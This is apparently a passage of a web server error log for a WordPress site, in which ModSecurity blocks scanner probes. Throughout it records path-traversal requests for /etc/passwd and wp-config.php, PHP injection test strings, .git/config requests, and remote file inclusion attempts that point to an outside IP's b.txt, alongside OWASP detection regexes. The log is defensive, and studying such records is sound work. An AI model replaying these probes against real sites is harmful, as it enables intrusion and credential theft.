140077724260096] [client 193.201.9.12:48954] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_ne.php"] [unique_id "YuEKNY14IVwjpRMV4MKEagAAANU"] [Wed Jul 27 15:24:45.495016 2022] [authz_core:error] [pid 24366:tid 140077833365248] [client 193.201.9.12:37036] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/class.akismet-https.php [Wed Jul 27 15:24:49.989904 2022] [authz_core:error] [pid 24366:tid 140077841757952] [client 193.201.9.12:37048] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/class.akismet-https.php [Wed Jul 27 15:24:54.468797 2022] [authz_core:error] [pid 24366:tid 140077816579840] [client 193.201.9.12:37050] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/class.akismet-https.php [Thu Jul 28 02:56:50.491507 2022] [:error] [pid 23717:tid 140077741045504] [client 54.157.7.75:54238] [client 54.157.7.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:0x[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: 0x0da found within ARGS:0x[]: 0x0day"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "YuJBQiVsTzXHqp1fq-a-dAAAAJM"] [Thu Jul 28 06:49:35.336806 2022] [autoindex:error] [pid 27207:tid 139962733238016] [client 51.120.115.106:58788] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 28 22:32:44.246010 2022] [:error] [pid 26471:tid 139962716452608] [client 193.201.9.12:45182] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2019/index.php"] [unique_id "YuNU3K8bPNkP-nlTssx01QAAAJM"] [Thu Jul 28 22:32:49.522832 2022] [:error] [pid 27207:tid 139962850735872] [client 193.201.9.12:45184] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2019/index.php"] [unique_id "YuNU4W5-kUlRXl0x5gArZQAAAMM"] [Thu Jul 28 22:32:55.877693 2022] [:error] [pid 27207:tid 139962741630720] [client 193.201.9.12:45186] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2019/index.php"] [unique_id "YuNU525-kUlRXl0x5gArZgAAANA"] [Fri Jul 29 18:22:53.655711 2022] [autoindex:error] [pid 3650:tid 140472038074112] [client 208.67.105.73:35722] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jul 29 18:23:04.691788 2022] [:error] [pid 4451:tid 140471812687616] [client 208.67.105.73:35724] [client 208.67.105.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:l. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-plain.php"] [unique_id "YuRr2GL23ciziwEbmT9J7QAAANU"] [Sat Jul 30 15:29:33.895145 2022] [:error] [pid 29987:tid 140318116669184] [client 20.186.113.253:45406] [client 20.186.113.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "YuWUrSIQacchD3RYTuTAFwAAAIg"] [Sat Jul 30 15:29:33.916214 2022] [:error] [pid 29987:tid 140318041134848] [client 20.186.113.253:45408] [client 20.186.113.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_link. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_link: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "YuWUrSIQacchD3RYTuTAGAAAAJE"] [Sat Jul 30 15:29:33.936159 2022] [:error] [pid 29987:tid 140318024349440] [client 20.186.113.253:45410] [client 20.186.113.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "YuWUrSIQacchD3RYTuTAGQAAAJM"] [Sat Jul 30 15:29:33.957567 2022] [:error] [pid 29987:tid 140318032742144] [client 20.186.113.253:45412] [client 20.186.113.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "YuWUrSIQacchD3RYTuTAGgAAAJI"] [Sat Jul 30 15:29:33.985539 2022] [:error] [pid 29987:tid 140317999171328] [client 20.186.113.253:45414] [client 20.186.113.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "YuWUrSIQacchD3RYTuTAGwAAAJY"] [Sat Jul 30 15:29:34.007025 2022] [:error] [pid 30178:tid 140318024349440] [client 20.186.113.253:45416] [client 20.186.113.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filename. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "YuWUruhnyW30BeuF-jzT3AAAANM"] [Sun Jul 31 09:33:56.009254 2022] [:error] [pid 16596:tid 139726459713280] [client 193.201.9.12:42220] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_e.php"] [unique_id "YuaS1Izv4-NtxM407Vnn_gAAAM4"] [Sun Jul 31 09:34:05.550266 2022] [:error] [pid 16596:tid 139726384178944] [client 193.201.9.12:42224] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_e.php"] [unique_id "YuaS3Yzv4-NtxM407VnoAAAAANc"] [Sun Jul 31 09:34:13.666899 2022] [:error] [pid 16596:tid 139726392571648] [client 193.201.9.12:42226] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_e.php"] [unique_id "YuaS5Yzv4-NtxM407VnoAQAAANY"] 2022/07/31 09:58:47 [error] 16190#16190: *219038 access forbidden by rule, client: 44.242.163.254, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/07/31 09:58:50 [error] 16190#16190: *219045 access forbidden by rule, client: 44.242.163.254, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/07/31 09:58:53 [error] 16190#16190: *219057 access forbidden by rule, client: 44.242.163.254, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Aug 01 06:18:35.435089 2022] [autoindex:error] [pid 947:tid 140134128559872] [client 20.244.34.44:38492] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 01 23:15:28.367783 2022] [autoindex:error] [pid 948:tid 140133902771968] [client 107.182.129.194:48892] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 01 23:15:34.190965 2022] [:error] [pid 948:tid 140134170523392] [client 107.182.129.194:48894] [client 107.182.129.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:l. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-plain.php"] [unique_id "Yuik5mcf-pYdogrtGtoiUgAAAIA"] [Tue Aug 02 18:54:44.761807 2022] [:error] [pid 26431:tid 140488103421696] [client 193.201.9.12:47570] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://193.201.9.12 found within ARGS:url: http://193.201.9.12/b.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/ajax-index.php"] [unique_id "Yum5RNosXh78bmohD1j5SQAAAIQ"] [Tue Aug 02 18:54:57.891020 2022] [:error] [pid 27201:tid 140488053065472] [client 193.201.9.12:47572] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://193.201.9.12 found within ARGS:url: http://193.201.9.12/b.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/ajax-index.php"] [unique_id "Yum5UeXxtbpZzg_NPuHiswAAAMo"] [Tue Aug 02 18:55:06.945083 2022] [:error] [pid 27201:tid 140487935567616] [client 193.201.9.12:47574] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://193.201.9.12 found within ARGS:url: http://193.201.9.12/b.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/ajax-index.php"] [unique_id "Yum5WuXxtbpZzg_NPuHitAAAANg"] [Wed Aug 03 01:53:48.797496 2022] [:error] [pid 26431:tid 140487960745728] [client 152.89.196.102:43236] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/index3.php"] [unique_id "YuobfNosXh78bmohD1j9BwAAAJU"] [Wed Aug 03 01:53:52.701087 2022] [:error] [pid 27201:tid 140488212104960] [client 152.89.196.102:43242] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/index3.php"] [unique_id "YuobgOXxtbpZzg_NPuHongAAAMA"] [Wed Aug 03 01:53:56.517345 2022] [:error] [pid 27201:tid 140488086636288] [client 152.89.196.102:43248] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/index3.php"] [unique_id "YuobhOXxtbpZzg_NPuHonwAAAMY"] [Wed Aug 03 03:34:53.349256 2022] [autoindex:error] [pid 27201:tid 140488203712256] [client 20.244.34.44:48894] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 04 15:38:23.119696 2022] [:error] [pid 14210:tid 140391374370560] [client 152.89.196.102:57156] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag 